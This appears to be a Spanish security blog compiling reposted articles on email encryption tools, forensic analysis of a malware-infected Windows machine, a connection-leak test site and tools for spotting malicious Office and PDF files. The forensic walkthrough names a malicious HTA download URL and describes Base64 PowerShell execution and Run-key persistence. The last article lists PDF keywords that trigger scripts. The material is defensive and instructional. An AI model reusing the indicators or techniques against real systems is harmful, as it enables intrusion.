May 05

Artículo: Cómo cifrar correos electrónicos para tener seguridad en el email

Interesante artículo publicado en redeszone. Un artículo que intenta introducirnos en una comunicación más segura y protegida, dentro de lo que cabe….

https://www.redeszone.net/tutoriales/seguridad/cifrar-correos-electronicos-seguridad-aplicaciones/

El correo electrónico poco a poco ha ido aumentando su presencia hasta convertirse en una herramienta imprescindible. En gran medida, ha sustituido a la correspondencia en papel entre otras razones por motivos ecológicos. Sin embargo, no es el único motivo, la inmediatez con la que recibiremos un mensaje es su gran baza a favor. No obstante, a lo largo de los años se le han achacado problemas como es el caso de falta de privacidad. Por ese motivo, y para evitar que vuestra información privada caiga en manos de ciberdelincuentes y gobiernos, os vamos a proponer diferentes aplicaciones para cifrar correos electrónicos y mantener vuestra privacidad.about:blank

En el año 2013 se desveló la existencia del programa clandestino PRISM de la Agencia de seguridad de Nacional de Estados Unidos, conocida como NSA. Se descubrió que se estaban recopilando masivamente mensajes de, al menos, nueve grandes compañías de Internet. A parte de las organizaciones gubernamentales, están los ciberdelincuentes que buscan vulnerar nuestra privacidad para luego sacar beneficios. Como ya habréis deducido, cifrar correos electrónicos puede mejorar nuestra privacidad enormemente ya que solamente el destinatario legítimo de este correo será capaz de leerlo.

Mailvelope: la extensión multinavegador

Mailvelope es una extensión que podemos instalarla en los navegadores en Chrome, Edge y Firefox, para cifrar de forma segura nuestros correos electrónicos con PGP utilizando proveedores de correo web, es compatible con Gmail y Outlook que son los más utilizados a nivel doméstico y también profesional.

about:blank

Este complemento del navegador nos va a proporcionar encriptación de extremo a extremo para nuestro e-mail. Vamos a poder conseguir cifrar los correos electrónicos sin tener que cambiar nuestro proveedor de correo electrónico. En este sentido, hay que comentar que, tanto el cifrado como el descifrado se realizan en los dispositivos finales. Esto se traduce en que nuestros datos privados nunca saldrán de nuestro equipo sin estar cifrados.

Lo primero que tenemos que hacer es instalar Mailvelope en el navegador de tu elección:

Una vez instalada correctamente la extensión del navegador nos aparecerá una pantalla como esta, tras pulsar el icono rojo de la extensión del programa.

Entonces tocaremos sobre el botón ¡Iniciemos! Lo primero que necesitamos es generar nuestra clave para lo que pulsaremos en Generar llave. A continuación, nos aparecerá una pantalla como esta:

Luego, elegimos un nombre, ponemos nuestro correo electrónico y añadimos una contraseña que tenemos que repetir dos veces. Desde este momento, ya tenemos nuestra contraseña PGP. Luego nos tenemos que dirigir a nuestro e-mail para verificar la dirección de correo electrónico que pusimos en el servidor de claves de Mailvelope. Así, otros usuarios de Mailvelope podrán enviarnos correos cifrados. En la bandeja de entrada del correo veremos que tenemos un mensaje como este:

Ahora es el turno de pulsar en Mostrar mensaje, y aparecerá esta pantalla:

Aquí nos va a pedir que introduzcamos la contraseña que hemos establecido antes de Mailvelope. Una vez hecho, nos aparecerá el mensaje totalmente descifrado:

En este momento tendremos que pulsar sobre el link para verificar el correo y poder usar el programa. La forma de descifrar seguirá el mismo procedimiento para todos los correos electrónicos que nos manden en el futuro. Lo único que se debe tener en cuenta, es introducir la clave que corresponda. Respecto a la forma de mandar un correo electrónico encriptado, debe comenzar utilizando el editor de Mailvelope, cuyo icono es el que tenéis marcado con una flecha.

Por último, se escribe el texto y se envía.

Mymail Crypt for Gmail

Esta es otra extensión que podemos usar, pero en este caso sólo sirve para Google Chrome. El plugin podemos descargarlo desde la Chrome Store de forma gratuita. Nos encontramos que implementa GPG en Webmail (Gmail) usando la biblioteca OpenPGP.js. Hay que comentar que el proyecto no está afiliado a Google. Una vez completada la instalación, debemos acceder a las opciones de la extensión y allí generar nuestra clave de cifrado a la vez que importaremos las claves de nuestros contactos para que, al recibir un correo, este se descifre automáticamente.

Por lo tanto, tras haber entrado en opciones, nos dirigiremos a la solapa My Keys y pulsaremos sobre generate a new key.

Entonces aparecerá una pantalla como la siguiente:

Aquí, la configuración es muy similar a la del plugin anterior. Lo que tenemos que hacer es poner un nombre, añadir un correo, poner una password y pulsar sobre el botón de submit. A partir de ese momento, ya tendríamos un botón para poder cifrar correos electrónicos.

Así, nos llegaría un mensaje a nuestra bandeja de entrada un correo electrónico cifrado:

Y desde aquí podríamos descifrarlo:

Por último, aquí tenéis un video en que explica cómo se instala la extensión y más:https://www.youtube.com/embed/aAXIqnjbc-M?enablejsapi=1&version=3

Infoencrypt para cifrar desde la web

La ventaja que tiene respecto a las dos anteriores, es que es más sencilla de utilizar que las dos anteriores. En ese sentido, nos presenta dos ventajas importantes:

  1. No requiere de ninguna instalación de software.
  2. Es fácil de usar y no tenemos que configurar nada.

En cuanto al cifrado que utiliza es AES de 128 bits. Se trata del cifrado más popular y ha sido aprobado por la NSA de Estados Unidos para su uso interno. Para poderlo utilizar tenemos que acceder a la web de Infoencrypt desde el siguiente enlace. Entonces nos saldrá esta pantalla que podremos usar para cifrar correos electrónicos:

Su forma de utilización es muy sencilla, arriba del todo en el cuadro blanco grande escribimos el texto que queremos cifrar y escribimos la contraseña dos veces. A continuación, lo que tenemos que hacer es pulsar sobre el botón Encrypt. Entonces copiamos el texto que genera y lo mandamos por correo electrónico. Luego destinatario entra en esta web, copia el texto encriptado, introduce la password y pulsa Decrypt para descifrar el texto. Sin duda, es una forma interesante para cifrar correos electrónicos ocasionalmente.

CipherMail para Google Chrome

Gracias a esta extensión para Chrome podremos enviar mensajes encriptados para Gmail, Outlook o cualquier otro correo electrónico utilizando la tecnología S/MIME y certificados con CipherMail. Las características principales de CipherMail son:

  • Cifrado de correo electrónico S/MIME 3.1 (X.509, RFC 3280).
  • Soporte de texto simple y HTML estando ambos formatos encriptados.
  • Integración con Google usando OAuth2.
  • Admite los protocolos del servidor de correo SMTP e IMAP.

Aquí tenemos la pantalla donde podemos enviar mensajes cifrados con S/MIME:

Este es un vídeo demostrativo de cómo funciona la extensión:https://www.youtube.com/embed/KuJ5CV1YXCA?enablejsapi=1&version=3

Si queréis probar la extensión CipherMail para cifrar correos electrónicos podéis descargarla de la Chrome Web Store desde aquí.

ProtonMail Bridge

ProtonMail Bridge se trata de una aplicación de escritorio que hace de puente de cifrado entre el servidor de correo electrónico que usemos habitualmente, y los servidores de la firma, todo ello con el objetivo de cifrar los mensajes que enviemos. Este programa de ProtonMail es compatible con la mayoría de servicios de correo como ThunderbirdApple Mail o cualquier otro de escritorio que utilice los protocolos IMAP y SMTP. Esta sería la pantalla de configuración de IMAP/SMTP de ProtonMail Bridge:

La herramienta está disponible para Windows, MacOS y Linux, podéis descargarla desde este enlace.

Criptext: el servicio de email más seguro

Según el desarrollador Criptext se trata posiblemente de uno de los servicios de correos más seguros del mundo.

Entre sus características están la encriptación punto a punto, es de código abierto, utiliza el protocolo Signal y no almacenan datos en la nube. Además, si envías un correo equivocado puedes retractarte en caso de que no haya pasado una hora. El programa está disponible para Windows, Android, IOS, Mac y Linux.

Mailfence: otra alternativa muy interesante

Mailfence es una buena alternativa para cifrar correos electrónicos y así proteger nuestra privacidad.

Gracias a su cifrado y firmas digitales garantiza al destinatario que el remitente somos nosotros. Es gratuito y tenemos un espacio de 500 MB, pero si necesitamos más tendremos que recurrir a las opciones de pago. Si queremos aumentar a 5GB y 10 alias podríamos hacerlo por 2,5 € al mes, aquí tenéis toda la información.

Mozilla Thunderbird

El popular gestor de correo Mozilla Thunderbird, ha incluido recientemente OpenPGP de forma nativa, sin necesidad de instalar ninguna extensión en este gestor de correo, ni hacer complicadas configuraciones, ahora lo tendremos todo en el propio gestor de correo. Tendremos que crear las claves RSA o EC para cifrar los correos electrónicos, e importar las claves públicas de los destinatarios a los que queremos enviar emails cifrados con PGP. En RedesZone tenemos un completo tutorial de configuración y uso, por supuesto, es compatible con cualquier servicio de correo electrónico, porque el cifrado se realiza de forma local sin necesidad de instalar extensiones en los navegadores web.

Tal y como habéis visto, disponemos actualmente de una gran cantidad de programas y extensiones para enviar correos electrónicos de forma completamente segura y privada. Esperamos que, con todas estas herramientas, disfrutéis de la seguridad y privacidad a la hora de intercambiar correos electrónicos.

Abr 22

Artículo: Prepárate Malware, aquí viene el Forense.

Publicado por thehackingfactory.com/. Es una entrada del año 2017, pero continúa siendo interesante su lectura.

Debido al auge que están teniendo los ataques por Malware, cada vez son más las empresas que pierden sus datos o se pide una recompensa por ellos. Recordaremos que, no hace mucho, grandes empresas españolas se infectaron por un Ransomware denominado WannaCry o WannaCrypt el cual comenzó a propagarse por la red interna, cifrando todos los datos de los equipos y solicitando un posterior rescate por ellos. A la hora de identificar cual ha sido el vector de entrada de la infección, es recomendable realizar un análisis forense a los equipos. Existen muchos tipos de análisis forense, por lo que en este artículo nos centraremos en CÓMO realizar el análisis sobre sistemas Windows a través de un ejemplo.

ANÁLISIS FORENSE

Antes de comenzar, vamos a mostrar cierta información que es muy importante tener en cuenta a la hora de realizar un análisis forense.

BASES GENERALES

A la hora de llevar a cabo un forense, tenemos que tener en cuenta las siguientes bases:

  1. Verificar que efectivamente se ha producido un incidente de seguridad: nos hemos descargado un programa y nos hemos infectado, hemos abierto el adjunto de un correo que nos han enviado, etc… .
  2. Recopilar la máxima información posible acerca del incidente. 
  3. Identificar todas las fuentes de datos, tanto volátiles (memoria RAM) como no volátiles.
  4. Verificar que los datos identificados son íntegros y garantizar la cadena de custodia.
  5. Elaborar un informe de seguridad en dónde se muestren los resultados del análisis llevado a cabo.

ESTADOS DEL EQUIPO INFECTADO

Dependiendo del estado en el que se encuentre el equipo a la hora de recoger evidencias, se realizarán unos u otros procedimientos. Los equipos nos los podemos encontrar en dos estados:

  1. Equipo vivo: el dispositivo no se ha apagado y mantiene procesos en ejecución e información en la memoria RAM. Hay que tener en cuenta que esta memoria es volátil y apagar el equipo provocaría la eliminación de información relevante, por lo que el primer punto obligatorio es hacer un dump de ella utilizando un Pendrive con las herramientas correspondientes las cuales no deben realizar modificaciones en el sistema. Posteriormente tiraremos del cable, ya que la opción de apagar de Windows realiza modificaciones en el sistema y procederíamos a tratalo como un equipo Post-mortem.
  2. Equipo muerto (Post-mortem): el dispositivo se ha apagado por cualquier circunstancia y no dispone de procesos en memoria RAM ya que al ser volátil se pierde al apagarlo. En este estado realizaremos la imagen del disco a un fichero o la clonación a otro disco (copia bit a bit) a través de las herramientas correspondientes.

Una vez se han obtenido las imágenes, tanto de la memoria como del disco, comienza la investigación.

 REALIZANDO EL ANÁLISIS FORENSE

Para ponernos en situación, una empresa nos comenta que uno de los equipos de un empleado ha comenzado a realizar acciones sospechosas y tiene un comportamiento extraño. Debido a esto, nos han solicitado un forense para ver que ha podido pasar, por lo que nos envían dos ficheros de imagen, uno de la memoria RAM y otro del disco, junto a sus correspondientes hashes:

CALCULANDO LOS HASHES

Antes de comenzar con el análisis, es obligatorio calcular los hashes de los ficheros recibidos con el objetivo de verificar que coinciden con los que nos han enviado. Si no coinciden significa que, o se han manipulado las imágenes o no se ha realizado el proceso correctamente y se habría roto la cadena de custodia. En este caso, a través de la herramienta md5sum, confirmamos la coincidencia de los hashes:

COMPROBANDO ZONA HORARIA

Como primer paso en el análisis que vamos a realizar, es comprobar la zona horaria que estaba configurada en el equipo con el objetivo de verificar la hora en la que se han ejecutado los procesos. Montaremos la imagen del disco con FTK Imager y accederemos a la ruta C:\Windows\System32\config\ en la que encontraremos los siguientes ficheros:

  • DEFAULT
  • SAM: proporciona información referente de todos los usuarios del sistema (fecha de creación, último login, último cambio de password, etc…).
  • SECURITY: contiene información de seguridad utilizada por el sistema y la red.
  • SOFTWARE: contiene información acerca de los programas utilizados por todos los usuarios del equipo (versión, fecha de instalación, licencia, etc…).
  • SYSTEM: proporciona información sobre los perfiles de hardware del sistema, controladores, unidades de disco, etc… .

Además de las claves de los ficheros de registro anteriores, también son interesantes estos otros ficheros:

  • User\<usuario>\Ntuser.dat
  • User\<usuario>\Local\Data\Microsoft\Windows\UsrClass.dat

Vamos a extraer todos los ficheros de registro anteriores a una carpeta, a través de Botón derecho >> Extraer para su posterior análisis :

Los ficheros exportados tendremos que abrirlos con otro programa, en este caso utilizaremos Windows Registry Reader. Abriremos el fichero SYSTEM exportado y comprobaremos el ControlSet que tiene establecido, ya que puede haber varios. El ControlSet fichero contiene información del arranque del sistema y de la configuración de los dispositivos:

Observamos que se encuentra habilitado el ControlSet01, ya que la imagen sólo dispone de ese, por lo que accederemos al directorio \ControlSet01\Control\TimeZoneInformation para comprobar la clave TimeZoneName :

Dicha clave informa sobre la zona horaria establecida, que en este caso pertenece a Pacific Standard Time. A modo de ejemplo, si los procesos tienen como hora de ejecución las 13:50 horas del país de origen, como la zona se corresponde a Pacific Standard Time GMT +7 , habría que sumar siete horas por lo que los procesos se habrían ejecutado a las 20:50 hora española.

Procedemos a abrir otro fichero exportado, en este caso el fichero SAM, para ver otros usuarios que hay creados en el sistema. Seleccionaremos la opción SAM en la columna izquierda y desplegaremos la opción Users en la derecha. Aquí comprobaremos aquellos usuarios que además de estar creados, se han utilizado, a través de la última hora de login en el sistema:

El usuario RogerMoore, como se ve en la imagen, ha iniciado sesión en el sistema a las 01:19 en GMT+7. Los otros usuarios listados no han iniciado sesión.

COMPROBANDO SOFTWARE INSTALADO

Como la mayoría de las infecciones de malware se realizan a través de adjuntos en correos electrónicos, vamos a comprobar si el usuario RogerMoore dispone de algún gestor de correo. Para ello, abriremos el fichero exportado SOFTWARE y accederemos a la opción de menú Windows Instalation y a la pestaña Installed Software :

En ese listado, que se corresponde con todos los programas instalados en el ordenador, no encontramos un cliente de correo instalado aunque también podría haber accedido a un servicio de correo web mediante un navegador. Esto podemos comprobarlo en la caché del navegador que se encuentra en el fichero de imagen del disco.

COMPROBANDO EL HISTORIAL DEL NAVEGADOR

CHROME

Volvemos al FTK Imager y accedemos a la ruta \Users\<usuario>\AppData\Local\Google\Chrome\User Data\Default en la que encontraremos el fichero History el cual procedemos a extraer :

 Este fichero tiene como formato .sqlite por lo que necesitamos de otro programa para poder abrirlo. Nosotros vamos a utilizar DB Browser for SQLite para revisar todas las direcciones del campo url con el objetivo de ver si ha accedido a algún correo web como Gmail, Hotmail, Yahoo, etc… . Investigando un poco y utilizando como filtro la palabra mail, observamos que sí ha utilizado el servicio de correo web ProtonMail :

El campo fecha con valor 13122266747104583 se encuentra en un formato específico de Chrome por lo que tendremos que hacerlo legible. Nosotros utilizaremos la página https://www.epochconverter.com/webkit que es un conversor de timestamps a fechas legibles:


Se identifica que el usuario hizo login en el servicio de correo web Protonmail sobre las 03:05 del 30 de Octubre.

COMPROBANDO CORREOS ENVIADOS

A través de la caché del navegador, no podemos ver si se ha realizado el envío o la recepción de algún correo electrónico, pero podemos consultar el fichero de imagen de la memoria RAM en la que seguramente sigan esos correos. Las búsquedas sobre ficheros de imagen de memoria RAM las haremos con la herramienta volatility, aunque hay muchas otras. Lo primero que necesitamos saber es el sistema operativo al que pertenece este dump de memoria, pues dependiendo de cual sea, se utilizará un perfil de volatility u otro. Esta información la obtendremos con el parámetro imageinfo que, como se muestra en la siguiente imagen, nos indica que el sistema operativo es un Windows 10 32 bits (Win10x86_14393) :
 

Ahora añadiremos a la ejecución de volatility el parámetro –profile=”Win10x86_14393″ para aplicar el perfil correspondiente y el parámetro pstree para mostrar todos los procesos existentes en la memoria en forma de árbol. Los campos mostrados son los siguientes :

  • Name: nombre del proceso ejecutado.
  • Pid: número de proceso asociado al ejecutar el programa.
  • PPid: número de proceso del proceso padre que lo ha ejecutado.
  • Thds: número de veces que se ha ejecutado.
  • Time: fecha en la que se ha ejecutado.

La salida del comando es la siguiente:

Tendremos que ir revisando todos los procesos que aparecen e ir comprobando sus PPids para verificar que el proceso padre es el que tiene que invocar al servicio y no otro. Después de mucho y mucho revisar, nos fijamos en seis servicios de chrome que se encontraban abiertos (seguramente las pestañas del navegador) que vamos a analizar. Observamos que cada uno tiene su propio Pid y todos excepto el primero tienen el mismo PPid 5704 que se corresponde con el Pid del primer proceso de chrome, que es el padre de los demás (seguramente el propio navegador) :

Ya que averiguamos anteriormente que el usuario estuvo utilizando un servicio de correo web, vamos a analizar cada uno de estos procesos para ver que encontramos. Para extraer un proceso de la imagen de la memoria RAM, utilizaremos volatility con los parámetros memdump -p <número_de_proceso> –dump-dir=”<directorio_salida>” :

 Si accedemos al directorio de salida indicado en el parámetro –dump-dir , observamos el fichero del dump del proceso, en este caso el proceso con PID 4992 :

Utilizaremos el comando strings para buscar cadenas dentro de este fichero .dmp . Como ejemplo, vamos a proceder a buscar la cadena To: que aparece en los correos electrónicos :

Parece ser que tenemos coincidencias. Otra forma de hacer esto es volcar todo el contenido a un fichero .txt y realizar las búsquedas en él. De esta otra forma, hemos encontrado el contenido del correo que le han enviado a nuestro usuario :

 Ya tenemos evidencia de que la infección se ha llevado a cabo a través de un correo electrónico.

COMPROBANDO EJECUCIONES DE PROGRAMAS

Comprobaremos ahora que es lo que se ha ejecutado en el sistema. Todos los programas que se han ido ejecutando en ese ordenador, se almacenan en la carpeta Prefetch que se encuentra en la ruta C:\Windows\Prefetch dentro de la imagen del disco. Para poder exportarla, tendremos que ir a la imagen del disco en FTK Image :

Exportamos la carpeta Prefetch de la imagen del disco y comprobamos, en el directorio de destino, todos los procesos que tenemos:

Para un mayor análisis, utilizaremos la herramienta WinPrefetchView que nos detallará cada uno de estos procesos con la hora de creación, hora de modificación, tamaño del fichero, ruta del proceso, número de ejecuciones, etc… . Por defecto este programa se abrirá configurado para leer la carpeta de nuestro ordenador C:\Windows\Prefetch :

Antes de nada, tendremos que indicarle la ruta en la que se encuentra la carpeta Prefetch que acabamos de exportar. Una vez cargada, se muestran todas las ejecuciones que hemos extraído de la imagen del disco. Ordenaremos por la hora de modificación y nos iremos fijando en cada uno de ellos para detectar ejecuciones sospechosas:

En este caso, después de mucho analizar, nos encontramos con una secuencia de ejecución de programas un tanto sospechosa :

Cada uno de estos procesos, se detalla a continuación:

  • powershell.exe: es una interfaz de consola, más poderosa que DOS, creada para la automatización de tareas administrativas a los usuarios.
  • net.exe: es un proceso del sistema de windows capaz de manipular otros programas, conectarse a internet y registrar entradas. Su denominación es utilizado muy a menudo por el malware para intentar pasar desapercibido. Debe localizarse en C:\Windows\System32 o en su defecto, puede ser un proceso malicioso.
  • tasklist.exe: este proceso muestra todos los servicios, servicios corriendo bajo procesos, servicios corriendo bajo una cuenta de usuario, aplicaciones, etc… que están corriendo en el sistema, detallando el PID (Process ID) de cada uno de ellos.
  • whoami.exe: muestra información del usuario que se encuentra autenticado, como por ejemplo el grupo al que pertenece y los privilegios que dispone. Utilizado sin parámetros muestra el dominio y el nombre de usuario. Es utilizado en intrusiones sobre sistemas para verificar el usuario con el que nos encontramos y sus privilegios.
  • mshta.exe: este proceso, por defecto en Windows, es el encargado de ejecutar ficheros con extensión hta, que es la abreviación de HTML Aplication. Estos ficheros están formados por etiquetas HTML y algún lenguaje de Script (VBScript o Javascript), que pueda ser ejecutado por Internet Explorer, y son muy utilizados como medio de infección a través de correos web. A continuación mostramos un ejemplo:

COMPROBANDO LA CACHE DE WINDOWS

Al igual que con pasos anteriores, accederemos a la imagen del disco a través del FTK Imager y exportaremos el fichero WebCahceV01.dat unicado en C:\Windows\Webcache a un directorio:

 Para abrir este otro fichero de caché utilizaremos el programa IECacheView . Nada más abrirlo y habiendo ordenado los procesos por fecha, nos encontramos con la ejecución de un fichero de extensión .hta , conneryhaters[1].hta , el cual hace una petición a la dirección URL http://128.199.170.85/conneryhaters.hta a las 03:24 , hora que coincide con la ejecución del proceso MSHTA.EXE que hemos visto en el directorio Prefetch del punto anterior:

Comprobamos que la ruta en la que se encuentra el fichero C:\Users\RogerMoore\AppData\Local\Microsoft\Windows\INetCache\Low\IE\DT34KEU7\conneryhaters[1].hta es una ruta perteneciente al usuario:

Si accedemos a esa ruta, identificamos el fichero ejecutado del cual podemos ver su contenido, formado por etiquetas HTML y lenguajes de script como comentamos anteriormente. En este caso se crea un objeto ActiveX que ejecutará powershell.exe cuyo contenido se encuentra en Base64:
 

 Ya que Base64 es un sistema de codificación, es posible decodificarlo para ver su contenido, en el que nos encontramos una llamada a la misma dirección URL de antes pero dirigida al fichero index.asp en el puerto 8080 de ese servidor:

Para conocer un poco más de información sobre este fichero .hta, nos dirigimos al directorio de Windows C:\Windows\System32\winevt\Logs en el que se recogen todos los eventos generados por el sistema y los analizamos. Entre ellos, encontramos los eventos de Powershell relacionados:

 Ahora, procedemos a extraerlos y a hacer doble click sobre ellos para que el gestor de eventos de Windows los abra, pudiendo observar la información detallada que nos muestra:

Tal y como sospechábamos, se produjo la ejecución del fichero conneryhaters[1].hta a través del cual se produjo la ejecución de Powershell. Cómo último paso, comprobaremos si ha creado persistencia en el sistema en las rutas :

Parece ser que la ejecución de este script ha generado un nuevo valor en la clave Run para asignar persistencia cada vez que se arranque el ordenador.

Abr 22

Artículo: WhatLeaks: ver qué se filtra de nuestra conexión.

Entrada original: https://blog.segu-info.com.ar

Existen herramientas que nos permiten analizar la eficacia de nuestras conexión a Internet, VPN, proxies web, TOR y similares a la hora de proteger nuestra privacidad. Hoy vamos a analizar una de esas, una web llamada “What Leaks?” (‘¿Qué se filtra?’).

Lo que nos ofrece WhatLeaks.com es que, únicamente con entrar en ella, nos mostrará todos los datos que puede extraer sobre nosotros a partir de nuestra conexión y nuestro navegador.

Así, por ejemplo, nos mostrará desde qué IP nos estamos conectando (y si pertenece a alguna lista negra de IPs), y la geolocalizará con notable precisión. Igualmente nos mostrará si nos conectamos a través de algún proxy o de la red TOR, si tenemos o no activado el JavaScript, desde qué versión del navegador y sistema operativo nos estamos conectando y qué puertos tenemos abiertos.

Aquí se puede comprobar el antes y después de recurrir a un servicio VPN, los datos varían notablemente:VPN 1
Antes de utilizar una VPN


Aspecto que muestra el test al conectarnos tras una conexión Tor con el navegador Brave: sólo una geolocalización falsa y que nuestro navegador está en español.

En otra sección de su web, WhatLeaks ofrece algunas recomendaciones sobre aspectos a tener en cuenta a la hora de elegir un servicio VPN (recomienda, sobre todo, no recurrir nunca a VPNs gratuitos, y asegurarnos de que no mantiene un registro de nuestras actividades).

Además, recomienda un par de servicios VPN (mostrados como ‘partners’ de la web, lo que permite poner en duda la neutralidad de la recomendación) y desaconseja otros siete, entre ellos casualmente el usado en esta prueba.

Abr 21

Artículo: Herramientas para el análisis archivos de Microsoft Office.

Interesante artículo publicado en blog.elhacker.net

Algunos de los métodos que podríamos utilizar si recibimos un documento de una fuente sospechosa y queremos detectar si contiene código malicioso o no. Es importante recordar que los cibercriminales constantemente están creando nuevas técnicas de evasión u ofuscación, por lo que es posible que algunas de estas técnicas (o todas) no puedan aplicarse en algún caso particular. Una de las maneras más sencillas es analizar el Documento con VirusTotalFOCA o DIARIO, pero a menudo, esto puede no ser suficiente.

Métodos para detectar si un documento de Office contiene código malicioso

Antes de mencionar los métodos que nos podrían ayudar a determinar si un documento tiene contenido malicioso o no, es importante tener presente algunas cuestiones relacionadas con estos:

  • Archivos con extensión terminada en X (docx, xlsx, etc.):

Este tipo de archivos están organizados en una estructura con una colección de múltiples archivos con formato XML en base al estándar Office Open XML (OOXML) desarrollado por Microsoft. Por la convención adoptada en este estándar, los archivos OOXML son archivos ZIP, por ende, podemos abrir uno de estos archivos con alguna herramienta de compresión/descompresión. Por ejemplo, con 7zip.

Una vez descomprimido, observaremos la existencia de muchos archivos. Por ejemplo, el archivo [Content_Types].xml que contiene información de todo el documento; o archivos que terminan con la extensión “rels” (por ejemplo “document.xml.rels”) que son utilizados para establecer relaciones entre distintas secciones del documento —estilos, pie de página o URL con enlaces externos.

  • Macros

Una macro es una serie de instrucciones agrupadas bajo un mismo comando que permiten ejecutar una tarea de forma automática en un documento. De esta manera, los cibercriminales desarrollan macros (por lo general utilizando el lenguaje de programación Visual Basic) para ponerlas dentro de documentos con fines maliciosos.

  • Object Linking and Embedding (OLE)

OLE es una tecnología desarrollada por Microsoft que permite tomar un Objeto de un documento y colocarlo en otro; por ejemplo, incluir una tabla de una planilla de Excel en un documento de Word.

La inclusión puede hacerse por medio de la vinculación (linking) contra otra aplicación, permitiendo así que los datos no estén en el archivo original. Otra opción puede ser que estén incrustados (embedding) haciendo que sean parte del mismo documento y desligándolos de su archivo de origen.

Los criminales pueden utilizar estos objetos OLE para incluir código malicioso desarrollado, por ejemplo, en Visual Basic o JavaScript, para que se ejecute cuando el usuario interactúa con ellos.

Por último, si vamos a realizar un análisis sobre un documento es conveniente hacerlo dentro de una máquina virtual para evitar una posible infección sobre la computadora física.

A su vez, si uno recibe un documento cuya procedencia se desconoce, es recomendable no descargarlo ni tampoco ejecutarlo.

Analizar el archivo con Oletools y Oledump

En esta parte vamos a extraer y analizar objetos OLE o macros que estén dentro de un documento malicioso. Para ello, utilizaremos dos herramientas: oletools y oledump.py.

Para analizar un archivo con Oledump, primero vamos a ejecutar el programa y le indicamos el documento que deseamos analizar.

Herramientas para el análisis archivos de Microsoft Office

Munpack
Exiftool
Didier Stevens Suite
Olevba
msoffice-crypt
OfficeMalScanner
Hachoir-subfile
xxxswfpy

A grandes rasgos, todas las técnicas de análisis de archivos contemplan los siguientes elementos:

  • Verificar el documento en busca de etiquetas y scripts peligrosos
  • Detectar código en línea como shellcode, macro VBA, Javascript, Powershell y más
  • Extraer el código u objeto sospechoso del archivo
  • Si es posible, eliminar el código extraído (aunque, con un grado muy alto de probabilidad, el código ofuscado es dañino)

Oletools: Este es un poderoso kit de herramientas de Python para analizar archivos Microsoft OLE2, principalmente documentos de Microsoft Office como archivos de Word o Power Point, mencionan los expertos en forense digital.

Con el argumento -s <STREAM_NRO> podemos ubicarnos sobre alguno de estos streams y con el argumento -v podemos ver el código de la macro.

Oletools ofrece muchas herramientas. En este caso utilizaremos el script “olevba.py” para extraer y analizar macros de un documento.

Ejecutamos el script con el argumento -a para que analice el documento.

Podemos encontrar algunas cosas sospechosas en un archivo. Por ejemplo, las palabras claves Create o CreateObject, entre otras.

En este paquete podremos encontrar muchas otras herramientas, incluyendo:

PCODEDMP: Este es un desensamblador de código Pi (esencialmente un código de shell) de documentos. Los expertos en forense digital mencionan que esta herramienta requiere de oletooles para funcionar correctamente.

Oledump:

$ python oledump.py –version
oledump.py 0.0.27

DidierStevensSuite $ python oledump.py -h
Usage: oledump.py [options] [file]
Analyze OLE files (Compound Binary Files)

Options:
–version show program’s version number and exit
-h, –help show this help message and exit
-m, –man Print manual
-s SELECT, –select=SELECT
select item nr for dumping (a for all)
-d, –dump perform dump
-x, –hexdump perform hex dump
-a, –asciidump perform ascii dump
-v, –vbadecompress VBA decompression
–vbadecompresscorrupt
VBA decompression, display beginning if corrupted
-r, –raw read raw file (use with options -v or -p
-e, –extract extract OLE embedded file
-i, –info print extra info for selected item
-p PLUGINS, –plugins=PLUGINS

Detectar macros desde el documento

Este método requiere que abramos el documento, por ende, antes de abrirlo debemos tener habilitada la protección contra macros. Los pasos para habilitar la protección pueden encontrarse en el siguiente enlace.

Una vez que tengamos el documento abierto tenemos que ir a la sección View -> Macros -> View Macros. 

Hecho esto, nos aparece un menú con las macros del documento. Para poder ver las macros vamos a tener que crear una nueva macro. Para ello, ponemos un nombre cualquiera en la sección “Macro name” y a su vez, en la sección “Macros in”, seleccionamos la opción “All active templates and documents”. Esto nos va a habilitar la opción “Create”, la cual usamos para abrir el Visual Basic for Applications.

Al abrirse el Visual Basic for Applications podemos ver el documento que estamos analizando y sus subcarpetas. Si seleccionamos cada elemento de sus subcarpetas podemos obtener el código fuente de cada macro en caso de existir.

Herramientas de análisis PDF

  • PDF Stream Dumper: Esta es una utilidad GUI de Windows para el análisis de PDF muy popular entre la comunidad de especialistas en ciberseguridad.
  • PDF-parser: Usar esta herramienta le permite a los expertos en forense digital extraer elementos individuales de un archivo PDF, como encabezados, enlaces y más, para su análisis detallado.
  • PDFID: PDFID enumera todos los objetos del archivo PDF analizado.
  • PEEPDF: Este es un marco de análisis bastante poderoso que incluye búsqueda de shellcode, Javascript y más. PEEPDF está habilitado de forma predeterminada en Kali Linux.
  • PDFxray: Esta herramienta tiene la mayoría de las utilidades necesarias en forma de scripts de Python separados, pero requiere muchas dependencias, mencionan los expertos en forense digital.

¿Qué debemos buscar al analizar un documento PDF?

En primer lugar, los especialistas en forense digital recomiendan buscar los siguientes parámetros:

  • /OpenAction y /AA, ya que pueden ejecutar scripts automáticamente
  • /JavaScript y /JS respectivamente ejecutan js
  • /GoTo, ya que esta acción cambia la página visible del archivo, puede abrir y redirigir automáticamente a otros archivos PDF
  • /Launch es capaz de iniciar un programa o abrir un documento
  • /SubmitForm y /GoToR pueden enviar datos por URL
  • /RichMedia se puede utilizar para incrustar flash
  • /ObjStm puede ocultar objetos

Prueba de seguridad

En este paso, usaremos un documento cargado con malware para explotar la falla identificada como CVE-2017-11882.

Revisemos los scripts de VBA:

olevba exploit.doc

Inmediatamente encontraremos toneladas de líneas de script VBA, y al final también muestran lo que hace. La siguiente prueba es analizar un archivo PDF usando PDFID para ver todos los objetos en el archivo.

Como se muestra a continuación, el archivo PDF contiene objetos /ObjStm. Para asegurarnos de que no impacten negativamente nuestros sistemas, podemos extraer estos objetos del archivo y los considerarlos por separado utilizando PDF-parser.

Detectar URL maliciosas en el documento

Algunas veces, los cibercriminales en vez de poner el código malicioso en el documento lo que hacen es invocar a otro documento mediante una URL maliciosa y al momento de abrirlo, no estamos viendo el contenido del documento en sí, sino que estamos viendo otro documento que se descargó de Internet. Esta técnica también es conocida como template injection.

Para buscar la existencia de estas URL, abrimos el documento con la herramienta 7zip y vamos a ir extrayendo los archivos que contiene. Partimos por extraer archivos como “document.xml.res” o “webSettings.xml.res” buscando tags o atributos como sourceFileName, attachedTemplate,Target,TargetMode.

También buscamos alguna URL que sea distinta a las oficiales de Microsoft. Ejemplo de URL oficiales pueden ser http://schemas.openxmlformats.org/http://schemas.microsoft.com/.

   

Oct 05

Entrevista: Asociación Profesional de Peritos de Nuevas Tecnologías, una profesión de futuro Computerworld University

